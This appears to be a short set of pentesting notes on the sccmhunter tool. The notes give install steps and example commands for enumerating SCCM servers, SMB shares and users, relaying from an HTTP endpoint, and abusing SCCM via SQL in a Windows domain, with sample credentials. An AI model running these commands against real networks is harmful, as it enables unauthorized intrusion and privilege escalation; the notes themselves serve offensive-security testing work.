# sccmhunter.py

A rad tool for hunting SCCM!

# Install

git clone https://github.com/garrettfoster13/sccmhunter.git
cd sccmhunter
virtualenv --python=python3 .
source bin/activate
pip3 install -r requirements.txt
python3 sccmhunter.py -h

# Enumerate SCCM config, enumerate remote hosts SMB shares, signing status, and SQL service status

sccmhunter.py find -u lowpriv -p 'JingleAllTheWay!' -d schwarzenegger.com -dc-ip 10.0.5.5

# Enumerate SMB shares

The instructions say this "profiles and enumerates SMB shares of discovered SCCM servers, where as the find command "Enumerates LDAP and SCCM assets." I believe it does an SMB-level dive into shares looking for PXEBoot variables files.

sccmhunter.py smb -u lowpriv -p pass -d domain.com -dc-ip 1.2.3.4

# Enumerate user accounts associated with SCCM

python3 sccmhunter.py show -users

# View all the enumeration info you have after doing the "find" command

sccmhunter.py show -all

# Relay from an HTTP endpoint

sccmhunter.py http -u lowpriv -p 'JingleAllTheWay!' -d schwarzenegger.com -dc-ip 10.0.5.5 -ldaps -auto

# Abuse via SQL

sccmhunter.py mssql -u lowpriv -p 'JingleAllTheWay!' -d schwarzenegger.com -dc-ip 10.0.5.5 -tu lowpriv -sc SITECODE